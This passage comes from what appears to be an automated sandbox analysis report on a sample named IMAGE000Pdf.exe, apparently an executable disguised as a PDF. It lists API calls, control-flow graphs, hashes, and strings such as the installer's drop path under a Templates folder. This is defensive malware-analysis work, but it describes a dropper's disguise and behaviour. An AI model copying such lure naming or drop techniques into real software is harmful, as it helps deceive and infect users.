                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                      • String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Minkfarms$C:\Users\user\Desktop$C:\Users\user\Desktop\IMAGE000Pdf.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                      • API String ID: 3441113951-3440639131
                                      • Opcode ID: 548301c1dfa22215a8893450befa883167be07a4132e0a9c717a82b6bd7fd6f7
                                      • Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
                                      • Opcode Fuzzy Hash: 548301c1dfa22215a8893450befa883167be07a4132e0a9c717a82b6bd7fd6f7
                                      • Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E
                                      APIs
                                        • Part of subcall function 6F93121B: GlobalAlloc.KERNEL32(00000040,?,6F93123B,?,6F9312DF,00000019,6F9311BE,-000000A0), ref: 6F931225
                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F931C8D
                                      • lstrcpyW.KERNEL32(00000008,?), ref: 6F931CD5
                                      • lstrcpyW.KERNEL32(00000808,?), ref: 6F931CDF
                                      • GlobalFree.KERNEL32(00000000), ref: 6F931CF2
                                      • GlobalFree.KERNEL32(?), ref: 6F931DD4
                                      • GlobalFree.KERNEL32(?), ref: 6F931DD9
                                      • GlobalFree.KERNEL32(?), ref: 6F931DDE
                                      • GlobalFree.KERNEL32(00000000), ref: 6F931FC8
                                      • lstrcpyW.KERNEL32(?,?), ref: 6F932182
                                      • GetModuleHandleW.KERNEL32(00000008), ref: 6F932201
                                      • LoadLibraryW.KERNEL32(00000008), ref: 6F932212
                                      • GetProcAddress.KERNEL32(?,?), ref: 6F93226C
                                      • lstrlenW.KERNEL32(00000808), ref: 6F932286
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2482669839.000000006F931000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F930000, based on PE: true
                                      • Associated: 00000000.00000002.2482628772.000000006F930000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482700059.000000006F934000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482741619.000000006F936000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6f930000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                      • String ID:
                                      • API String ID: 245916457-0
                                      • Opcode ID: daacb24da493e31a7223b5dc955dfe9f66bb0806d7c3ece03b07148f004dd6eb
                                      • Instruction ID: 412be3cdf6104a6d1335346638ed0465ff7b7b761725929facd424b4c1f06365
                                      • Opcode Fuzzy Hash: daacb24da493e31a7223b5dc955dfe9f66bb0806d7c3ece03b07148f004dd6eb
                                      • Instruction Fuzzy Hash: 38228B72D04629DADB248FB8C9806EEB7F8FF07315F10462AD166E61E0D774E9C58B90

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 606 405b00-405b26 call 405dcb 609 405b28-405b3a DeleteFileW 606->609 610 405b3f-405b46 606->610 611 405cbc-405cc0 609->611 612 405b48-405b4a 610->612 613 405b59-405b69 call 4063ee 610->613 614 405b50-405b53 612->614 615 405c6a-405c6f 612->615 621 405b78-405b79 call 405d0f 613->621 622 405b6b-405b76 lstrcatW 613->622 614->613 614->615 615->611 617 405c71-405c74 615->617 619 405c76-405c7c 617->619 620 405c7e-405c86 call 40674c 617->620 619->611 620->611 630 405c88-405c9c call 405cc3 call 405ab8 620->630 623 405b7e-405b82 621->623 622->623 626 405b84-405b8c 623->626 627 405b8e-405b94 lstrcatW 623->627 626->627 629 405b99-405bb5 lstrlenW FindFirstFileW 626->629 627->629 631 405bbb-405bc3 629->631 632 405c5f-405c63 629->632 646 405cb4-405cb7 call 405456 630->646 647 405c9e-405ca1 630->647 635 405be3-405bf7 call 4063ee 631->635 636 405bc5-405bcd 631->636 632->615 634 405c65 632->634 634->615 648 405bf9-405c01 635->648 649 405c0e-405c19 call 405ab8 635->649 638 405c42-405c52 FindNextFileW 636->638 639 405bcf-405bd7 636->639 638->631 645 405c58-405c59 FindClose 638->645 639->635 642 405bd9-405be1 639->642 642->635 642->638 645->632 646->611 647->619 652 405ca3-405cb2 call 405456 call 4061b4 647->652 648->638 653 405c03-405c07 call 405b00 648->653 658 405c3a-405c3d call 405456 649->658 659 405c1b-405c1e 649->659 652->611 657 405c0c 653->657 657->638 658->638 662 405c20-405c30 call 405456 call 4061b4 659->662 663 405c32-405c38 659->663 662->638 663->638
                                      APIs
                                      • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B29
                                      • lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?), ref: 00405B71
                                      • lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?), ref: 00405B94
                                      • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?), ref: 00405B9A
                                      • FindFirstFileW.KERNELBASE(007A3F50,?,?,?,0040A014,?,007A3F50,?), ref: 00405BAA
                                      • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405C4A
                                      • FindClose.KERNEL32(00000000), ref: 00405C59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                                      • API String ID: 2035342205-3790441623
                                      • Opcode ID: 2e078cdcde706d48225d83f3244a5f4697d9a3fc09f8fc82c0d1a14fe090b8d5
                                      • Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
                                      • Opcode Fuzzy Hash: 2e078cdcde706d48225d83f3244a5f4697d9a3fc09f8fc82c0d1a14fe090b8d5
                                      • Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,007A4F98,C:\,00405E14,C:\,C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406757
                                      • FindClose.KERNEL32(00000000), ref: 00406763
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID: C:\
                                      • API String ID: 2295610775-3404278061
                                      • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                      • Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
                                      • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                      • Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 139 403e6b-403e7d 140 403e83-403e89 139->140 141 403fbe-403fcd 139->141 140->141 142 403e8f-403e98 140->142 143 40401c-404031 141->143 144 403fcf-404017 GetDlgItem * 2 call 404344 SetClassLongW call 40140b 141->144 145 403e9a-403ea7 SetWindowPos 142->145 146 403ead-403eb0 142->146 148 404071-404076 call 404390 143->148 149 404033-404036 143->149 144->143 145->146 151 403eb2-403ec4 ShowWindow 146->151 152 403eca-403ed0 146->152 156 40407b-404096 148->156 154 404038-404043 call 401389 149->154 155 404069-40406b 149->155 151->152 157 403ed2-403ee7 DestroyWindow 152->157 158 403eec-403eef 152->158 154->155 176 404045-404064 SendMessageW 154->176 155->148 161 404311 155->161 162 404098-40409a call 40140b 156->162 163 40409f-4040a5 156->163 164 4042ee-4042f4 157->164 167 403ef1-403efd SetWindowLongW 158->167 168 403f02-403f08 158->168 166 404313-40431a 161->166 162->163 172 4040ab-4040b6 163->172 173 4042cf-4042e8 DestroyWindow EndDialog 163->173 164->161 171 4042f6-4042fc 164->171 167->166 174 403fab-403fb9 call 4043ab 168->174 175 403f0e-403f1f GetDlgItem 168->175 171->161 178 4042fe-404307 ShowWindow 171->178 172->173 179 4040bc-404109 call 40642b call 404344 * 3 GetDlgItem 172->179 173->164 174->166 180 403f21-403f38 SendMessageW IsWindowEnabled 175->180 181 403f3e-403f41 175->181 176->166 178->161 209 404113-40414f ShowWindow KiUserCallbackDispatcher call 404366 EnableWindow 179->209 210 40410b-404110 179->210 180->161 180->181 184 403f43-403f44 181->184 185 403f46-403f49 181->185 187 403f74-403f79 call 40431d 184->187 188 403f57-403f5c 185->188 189 403f4b-403f51 185->189 187->174 190 403f92-403fa5 SendMessageW 188->190 192 403f5e-403f64 188->192 189->190 191 403f53-403f55 189->191 190->174 191->187 195 403f66-403f6c call 40140b 192->195 196 403f7b-403f84 call 40140b 192->196 205 403f72 195->205 196->174 206 403f86-403f90 196->206 205->187 206->205 213 404151-404152 209->213 214 404154 209->214 210->209 215 404156-404184 GetSystemMenu EnableMenuItem SendMessageW 213->215 214->215 216 404186-404197 SendMessageW 215->216 217 404199 215->217 218 40419f-4041de call 404379 call 403e4c call 4063ee lstrlenW call 40642b SetWindowTextW call 401389 216->218 217->218 218->156 229 4041e4-4041e6 218->229 229->156 230 4041ec-4041f0 229->230 231 4041f2-4041f8 230->231 232 40420f-404223 DestroyWindow 230->232 231->161 233 4041fe-404204 231->233 232->164 234 404229-404256 CreateDialogParamW 232->234 233->156 235 40420a 233->235 234->164 236 40425c-4042b3 call 404344 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 234->236 235->161 236->161 241 4042b5-4042c8 ShowWindow call 404390 236->241 243 4042cd 241->243 243->164
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA7
                                      • ShowWindow.USER32(?), ref: 00403EC4
                                      • DestroyWindow.USER32 ref: 00403ED8
                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
                                      • GetDlgItem.USER32(?,?), ref: 00403F15
                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
                                      • IsWindowEnabled.USER32(00000000), ref: 00403F30
                                      • GetDlgItem.USER32(?,00000001), ref: 00403FDE
                                      • GetDlgItem.USER32(?,00000002), ref: 00403FE8
                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404002
                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404053
                                      • GetDlgItem.USER32(?,00000003), ref: 004040F9
                                      • ShowWindow.USER32(00000000,?), ref: 0040411A
                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
                                      • EnableWindow.USER32(?,?), ref: 00404147
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415D
                                      • EnableMenuItem.USER32(00000000), ref: 00404164
                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417C
                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040418F
                                      • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
                                      • SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
                                      • ShowWindow.USER32(?,0000000A), ref: 00404301
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                      • String ID:
                                      • API String ID: 3282139019-0
                                      • Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                      • Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
                                      • Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                      • Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 244 403abd-403ad5 call 4067e3 247 403ad7-403ae7 call 406335 244->247 248 403ae9-403b20 call 4062bc 244->248 255 403b43-403b6c call 403d93 call 405dcb 247->255 253 403b22-403b33 call 4062bc 248->253 254 403b38-403b3e lstrcatW 248->254 253->254 254->255 262 403b72-403b77 255->262 263 403bfe-403c06 call 405dcb 255->263 262->263 264 403b7d-403ba5 call 4062bc 262->264 269 403c14-403c39 LoadImageW 263->269 270 403c08-403c0f call 40642b 263->270 264->263 271 403ba7-403bab 264->271 273 403cba-403cc2 call 40140b 269->273 274 403c3b-403c6b RegisterClassW 269->274 270->269 276 403bbd-403bc9 lstrlenW 271->276 277 403bad-403bba call 405cf0 271->277 286 403cc4-403cc7 273->286 287 403ccc-403cd7 call 403d93 273->287 278 403c71-403cb5 SystemParametersInfoW CreateWindowExW 274->278 279 403d89 274->279 283 403bf1-403bf9 call 405cc3 call 4063ee 276->283 284 403bcb-403bd9 lstrcmpiW 276->284 277->276 278->273 282 403d8b-403d92 279->282 283->263 284->283 285 403bdb-403be5 GetFileAttributesW 284->285 290 403be7-403be9 285->290 291 403beb-403bec call 405d0f 285->291 286->282 297 403d60-403d68 call 405529 287->297 298 403cdd-403cf7 ShowWindow call 406773 287->298 290->283 290->291 291->283 303 403d82-403d84 call 40140b 297->303 304 403d6a-403d70 297->304 305 403d03-403d15 GetClassInfoW 298->305 306 403cf9-403cfe call 406773 298->306 303->279 304->286 307 403d76-403d7d call 40140b 304->307 310 403d17-403d27 GetClassInfoW RegisterClassW 305->310 311 403d2d-403d50 DialogBoxParamW call 40140b 305->311 306->305 307->286 310->311 314 403d55-403d5e call 403a0d 311->314 314->282
                                      APIs
                                        • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                        • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                      • lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000), ref: 00403B3E
                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,75923420), ref: 00403BBE
                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods), ref: 00403C25
                                        • Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342
                                      • RegisterClassW.USER32(007A7A00), ref: 00403C62
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7A
                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403CE5
                                      • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
                                      • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
                                      • RegisterClassW.USER32(007A7A00), ref: 00403D27
                                      • DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                      • API String ID: 1975747703-129562077
                                      • Opcode ID: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                      • Instruction ID: 7ce8ec14a48fa11d69b3a5e1f0875b7083b8d607cd9ed6182ea3b60f82ca9994
                                      • Opcode Fuzzy Hash: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                      • Instruction Fuzzy Hash: 286193702407007ED320AB669D46F2B3A7CEB85B49F40853FF941B22E2DB7D99018B6D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 318 403015-403063 GetTickCount GetModuleFileNameW call 405ee4 321 403065-40306a 318->321 322 40306f-40309d call 4063ee call 405d0f call 4063ee GetFileSize 318->322 323 403245-403249 321->323 330 4030a3 322->330 331 403188-403196 call 402fb1 322->331 333 4030a8-4030bf 330->333 337 403198-40319b 331->337 338 4031eb-4031f0 331->338 335 4030c1 333->335 336 4030c3-4030cc call 403444 333->336 335->336 343 4031f2-4031fa call 402fb1 336->343 344 4030d2-4030d9 336->344 341 40319d-4031b5 call 40345a call 403444 337->341 342 4031bf-4031e9 GlobalAlloc call 40345a call 40324c 337->342 338->323 341->338 365 4031b7-4031bd 341->365 342->338 369 4031fc-40320d 342->369 343->338 347 403155-403159 344->347 348 4030db-4030ef call 405e9f 344->348 355 403163-403169 347->355 356 40315b-403162 call 402fb1 347->356 348->355 367 4030f1-4030f8 348->367 360 403178-403180 355->360 361 40316b-403175 call 4068d0 355->361 356->355 360->333 368 403186 360->368 361->360 365->338 365->342 367->355 371 4030fa-403101 367->371 368->331 372 403215-40321a 369->372 373 40320f 369->373 371->355 374 403103-40310a 371->374 375 40321b-403221 372->375 373->372 374->355 376 40310c-403113 374->376 375->375 377 403223-40323e SetFilePointer call 405e9f 375->377 376->355 379 403115-403135 376->379 380 403243 377->380 379->338 381 40313b-40313f 379->381 380->323 382 403141-403145 381->382 383 403147-40314f 381->383 382->368 382->383 383->355 384 403151-403153 383->384 384->355
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00403026
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\IMAGE000Pdf.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                        • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                        • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                      • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMAGE000Pdf.exe,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                      • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
